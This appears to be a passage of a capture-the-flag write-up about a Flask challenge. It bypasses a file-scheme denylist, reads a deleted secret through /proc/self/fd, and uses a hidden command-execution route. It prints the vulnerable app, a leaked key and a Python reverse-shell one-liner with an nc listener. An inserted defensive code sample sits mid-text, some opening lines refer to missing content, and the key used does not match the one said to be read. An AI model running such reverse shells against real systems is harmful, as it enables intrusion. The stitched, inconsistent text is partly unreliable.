
No way. This... and that...

That's it?
Huh!?
Anyway, that is certainly not the intended solution, so let's look at the real one.
Read /proc/self/environ and /proc/self/cmdline:

We get:

Reading app.py gives:
```python
from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE)
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)  # defines the secret key, then deletes the file
# but the handle is never closed, so the file can still be found under /proc/self/fd/xxx

@app.route('/')
def index():
    return render_template('search.html')

@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)  # a file-fetching feature

@app.route('/no_one_know_the_manager')
def manager():
    key = request.args.get("key")
    print(SECRET_KEY)
    if key == SECRET_KEY:
        shell = request.args.get("shell")
        os.system(shell)
        res = "ok"
    else:
        res = "Wrong Key!"
    return res  # takes two parameters; if key == SECRET_KEY the command runs, but nothing is echoed back, so it can be used for a reverse shell

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)
```
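An added example, not part of this writeup or of the challenge's app.py, showing the two defects the comments above point at beside hardened versions: the secret file is unlinked while its handle is still open, so it stays readable through /proc/self/fd, and the fetcher relies on a scheme denylist (the `key == SECRET_KEY` comparison gets a constant-time replacement as well). All names here are my own (`load_secret_leaky`, `load_secret`, `deleted_files_still_open`, `url_is_allowed`, `key_matches`, `demonstrate`, `ALLOWED_SCHEMES`), the secret value is a constructed sample, and the /proc scan only does anything on Linux.

```python
# Added example (not the writeup's or the challenge's code): the two defects
# the comments in app.py point at, each beside a hardened version.
# All names below are my own; the secret value is a constructed sample.
import hmac
import os
import tempfile
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}  # assumption: the fetcher only needs these

def load_secret_leaky(path):
    """Same pattern as app.py: open(), read(), os.remove(), never close()."""
    f = open(path)
    secret = f.read().strip()
    os.remove(path)  # unlinked, but the open descriptor still references the inode
    return secret, f  # handle returned only so demonstrate() can inspect it

def load_secret(path):
    """Hardened: the handle is closed before the file is unlinked."""
    with open(path) as f:
        secret = f.read().strip()
    os.remove(path)
    return secret

def deleted_files_still_open(prefix=""):
    """Linux-only self-check: (fd, target) for descriptors whose target was
    unlinked, limited to targets under `prefix`. [] without /proc/self/fd."""
    fd_dir = "/proc/self/fd"
    if not os.path.isdir(fd_dir):
        return []
    found = []
    for name in os.listdir(fd_dir):
        try:
            target = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # descriptor closed between listdir() and readlink()
        if target.endswith(" (deleted)") and target.startswith(prefix):
            found.append((int(name), target))
    return found

def url_is_allowed(url):
    """Replacement for `not url.lower().startswith("file")`: an allowlist of
    schemes that must also carry a host, instead of a denylist."""
    if not url:
        return False
    parsed = urlparse(url)  # urlparse lowercases the scheme for us
    return parsed.scheme in ALLOWED_SCHEMES and bool(parsed.netloc)

def key_matches(supplied, secret):
    """Constant-time comparison in place of `key == SECRET_KEY`."""
    if supplied is None:
        return False
    return hmac.compare_digest(supplied.encode(), secret.encode())

def demonstrate():
    """Run both loaders on constructed secret files and report what a
    /proc/self/fd scan sees before and after the fix."""
    workdir = os.path.realpath(tempfile.mkdtemp())
    r = {"proc_available": os.path.isdir("/proc/self/fd")}

    leaky_path = os.path.join(workdir, "leaky.txt")
    with open(leaky_path, "w") as f:
        f.write("constructed-secret\n")  # constructed sample value
    secret, handle = load_secret_leaky(leaky_path)
    fd = handle.fileno()
    r["leaky_secret"] = secret
    r["leaky_file_gone"] = not os.path.exists(leaky_path)
    r["leaky_fd_visible"] = fd in [n for n, _ in deleted_files_still_open(workdir)]
    r["via_proc"] = None
    if r["proc_available"]:
        # Re-open through /proc, which is how the writeup recovers fd 3.
        with open("/proc/self/fd/%d" % fd) as g:
            r["via_proc"] = g.read().strip()
    handle.close()
    r["leaky_fd_visible_after_close"] = fd in [
        n for n, _ in deleted_files_still_open(workdir)]

    hard_path = os.path.join(workdir, "hardened.txt")
    with open(hard_path, "w") as f:
        f.write("constructed-secret\n")
    r["hardened_secret"] = load_secret(hard_path)
    r["hardened_file_gone"] = not os.path.exists(hard_path)
    r["hardened_leaks"] = len(deleted_files_still_open(workdir))
    os.rmdir(workdir)

    # True when the scan shows the leak before the fix and nothing after it
    # (trivially True where /proc is unavailable and the scan cannot run).
    r["leak_demo_ok"] = (not r["proc_available"]) or (
        r["leaky_fd_visible"] and r["via_proc"] == "constructed-secret"
        and not r["leaky_fd_visible_after_close"] and r["hardened_leaks"] == 0)
    return r
```

Calling `demonstrate()` on Linux returns `leaky_fd_visible` True and `via_proc` equal to the secret while the leaky handle is alive, and nothing under the work directory after the hardened loader runs. `deleted_files_still_open()` with no prefix is also usable as a quick runtime self-check in any long-running Python service that unlinks files it has opened.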
 
So read the key.
The fd number is tried one at a time; 3 is the one that works.
This reads out TqaOFuu2Sk29nB9Pc2s5wPKrWv/jknWSId5SFyNg7A4=
So spawn a reverse shell:
```
nc -lvp 3333
/no_one_know_the_manager?key=lxzY3xvJIDngLAx7RogcmxYWJX5MOWEKSCyT36xso7k=&shell=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',3333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
```
 
Once the shell connects back, just cat it.